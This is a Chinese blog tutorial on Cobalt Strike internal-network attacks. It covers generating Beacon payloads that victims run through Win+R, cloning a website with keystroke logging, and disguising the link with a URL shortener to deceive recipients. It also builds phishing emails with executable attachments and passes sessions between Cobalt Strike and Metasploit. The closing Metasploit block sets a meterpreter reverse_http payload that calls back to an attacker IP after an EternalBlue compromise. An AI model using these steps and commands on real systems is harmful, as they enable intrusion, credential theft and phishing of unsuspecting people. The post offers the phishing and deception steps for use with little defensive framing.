首页 > 其他分享 >CobaltStrike的内网安全

CobaltStrike的内网安全

时间:2024-07-05 18:55:38浏览次数:18  
标签:set payload 安全 上线 CobaltStrike CS MSF 内网 我们

1.上线机器的Beacon的常用命令

2.信息收集和网站克隆

3.钓鱼邮件

4.CS传递会话到MSF

5.MSF会话传递到CS

1上线机器的Beacon的常用命令

介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以

启动服务端,首先创建一个监听(注意,这里要关闭kali的Apache服务,要不然端口占用创建监听不成功)

payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP

点击save

接着我们用CS生成一个payload(Windows exe),使得我靶机上线:

Lisrener选择我们创建的监听服务,点击Launch

接着会生成一段payload,只要我们将这段payload在其他机器的win+R上粘贴运行,机器就会上线

利用:

打开CS上方的小云朵,会出现我们刚刚生成的web服务

选中服务,点击下方的Copy URL

启动我们的Windows10靶机,使用win+R,然后将我们复制的粘贴上去,点击确定

靶机上线

接着右击,打开命令窗口,输入命令就可以查看目标机器信息

常用命令:

1.调节时间可以更快的看到执行命令:sleep 3 (务必执行要不然回显太慢)

2.如果有的命令没有找到提示Unknow command:命令前加shell,比如:shell whoami

3.查看局域网情况:net view

4.我们可以可以对机器进行浏览器代理、VNC桌面交互、文件浏览、网络探测、端口扫描、进程列表和屏幕截图等等,这里不再一一展示



2.信息收集和网站克隆

信息收集:

生成的一个网页我们直接Launch即可

这时候会生成一个网址:

只要别人在内网中访问这个网址,我们就可以得到机器信息

使用Windows10,访问:

我们就可以在CS中的web log中获取机器的信息:

网站克隆:

我们输入我们需要克隆的网址,这里我选择的是百度,然后选择路径,Attack是攻击的站点,可以选也可以不选,这里我选的是信息收集的站点,开启键盘记录

生成成功:

如果我们要发给别人,让其访问,但是这样别人一看就不是正常的网址,我们可以用短链接修饰一下,使他看起来更有迷惑性:

这里可以随便选,我选的第一个,浏览器访问:

之前开了键盘记录,随便输一个:pengyuyan

查看CS的web log:

记录成功

3.钓鱼邮件 

第一个Targets:目标,我们新建一个文本文件,将想要发送邮件的目标地址写上去

第二个Template:就是模版,我们可以登录自己的邮箱,自己给自己发送一封邮件,然后点击导出eml文件(注意这里的邮件内容自己编写,可以把自己克隆的网站写上去)

第三个Attachment就是附件:可以不填也可以填一个可执行程序

第四个Embed URL:嵌入URL地址,同样可以写我们监听的地址

第五个邮件服务器:

第一个和第二个固定,第三个是自己邮箱,第四个是授权码,需要我们自己生成:

SSL连接

注意:这里要开启服务才行

第六个填写自己的邮箱地址

最后点击发送,这里是用我自己邮箱测试,查看自己的邮箱,果然发送成功:

4.CS传递会话到MS

打开MSF,建立监听:

注意这里需要使用的HTTP服务,写上本机IP,运行

打开CS,我们新建一个监听器:

点击save

然后选择靶机右键:

选择我们新建的监听器:

等待MSF连接:

连接成功

5.MSF会话传递到CS

 我们打开Windows7,使用永恒之蓝漏洞先让MSF上线:

接着进行设置:

返回后台bg

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lhost 192.168.11.128 # CS服务端IP

set lport 4444 # CS服务端监听的端口号

set DisablePayloadHandler True

set PrependMigrate True

set session 1 # 会话id

run

打开CS创建一个新的监听器:

save,等待上线

成功上线

标签:set,payload,安全,上线,CobaltStrike,CS,MSF,内网,我们
From: https://blog.csdn.net/2301_80116443/article/details/140214275

相关文章

  • 工地/矿区/电力/工厂/环卫视频智能安全监控反光衣AI检测算法的原理及场景应用
    一、引言随着科技的快速发展,特别是在智能交通和安全生产领域,对于夜间或弱光环境下的人员识别和安全监控需求日益凸显。反光衣作为一种重要的安全装备,被广泛应用于道路施工、工地作业、夜间巡逻、安全生产等场景,旨在提高人员的可见性,降低事故发生的概率。为满足这一需求,反光衣......
  • 工地/矿区/电力/工厂/环卫视频智能安全监控反光衣AI检测算法的原理及场景应用
    一、引言随着科技的快速发展,特别是在智能交通和安全生产领域,对于夜间或弱光环境下的人员识别和安全监控需求日益凸显。反光衣作为一种重要的安全装备,被广泛应用于道路施工、工地作业、夜间巡逻、安全生产等场景,旨在提高人员的可见性,降低事故发生的概率。为满足这一需求,反光衣AI检......
  • 从“钓”到“管”:EasyCVR一体化视频解决方案助力水域安全管理
    一、背景随着城市化进程的加快,越来越多的市民热衷于钓鱼活动。钓鱼活动在带来乐趣的同时,也伴随着一定的安全隐患。尤其是在一些危险水域,也经常出现垂钓者的身影,非法垂钓,这给城市管理带来了不小的阻力。传统的人员巡逻监管效率低并且存在时间差,很难及时发现这些违规行为。为了提高......
  • 电脑使用什么远程控制软件?推荐使用安全软件ToDesk
    当你面临紧急工作需求,但却和办公电脑相隔千里时,远程控制电脑就派上了用场!初次使用远程控制软件的人,可能会担心使用时会不会存在信息被盗取,使用过后会不会发生被陌生人悄悄远控的情况小社长向大家安利一个超好用的远程控制软件ToDesk!电脑远程控制高清不卡顿,传输文件速度超快,免费......
  • 微服务架构是什么?他有什么优缺点。其实的安全问题如何解决?
    微服务是指把一个应用程序划分多个独立的服务单元。服务单元之间使用轻量级的通信机制进行通信。优点:1,技术栈比较灵活,2.易于维护和升级3,易于扩展;针对需要的服务单元进行扩展而不必对整个程序进行重构缺点:1,部署难度大,运维复杂2.安全性问题,服务单元通信可能导致数据的泄露......
  • 房屋结构安全性监测,云监测实时守护建筑安全
    现代化城市之中的建筑结构形式的复杂多样,对结构安全性的要求自然也变得日益严苛。同时,老旧房屋的安全隐患引人注目,其安全性随时间推移愈发凸显。诸多老旧房屋已达到使用年限,其持续安全使用的可行性需要验证。在环境因素及外部荷载的共同作用下,建筑物可能会出现不均匀沉降、倾......
  • 全网最全网络安全入门指南(2024版)零基础可学_网络安全学习指南
    下一个十年的饭碗就是它了!据悉,2019年9月27日,工信部发布**《关于促进网络安全产业发展的指导意见(征求意见稿)》,明确提出2025年培育形成一批营收20亿元以上的网络安全企业,网络安全产业规模超过2000亿元的发展目标;据市场调研机构Gartner预测,我国网络安全预计将以......
  • 信息安全新挑战:云计算环境下的等保测评实践探索
    随着信息技术的飞速发展,云计算技术因其灵活性、可伸缩性和经济性,正逐渐成为企业和组织构建信息系统的首选。然而,云计算环境的复杂性和动态性也为信息安全带来了新的挑战,尤其是在信息安全等级保护(以下简称“等保”)测评方面。本文将从云计算环境下的等保测评面临的挑战、应对策略......
  • Linux 账号安全管理及应用
    一、账号安全控制1.系统账号清理1.1 将非登录用户设置为无法登录usermod-s /etc/nologin pkm     #将名为pkm用户的shell设为/sbin/nologin用户pkm将无法登录1.2锁定长期不使用的账号usermod -L   用户名       #锁定......
  • 详解Web应用安全系列(8)不足的日志记录和监控
    在Web安全领域,不足的日志记录和监控是一个重要的安全隐患,它可能导致攻击者能够更隐蔽地进行攻击,同时增加了攻击被检测和响应的难度。以下是对Web攻击中不足的日志记录和监控漏洞的详细介绍。一、日志记录不足的问题日志缺失或不完整关键操作未记录:如用户登录、敏感数据......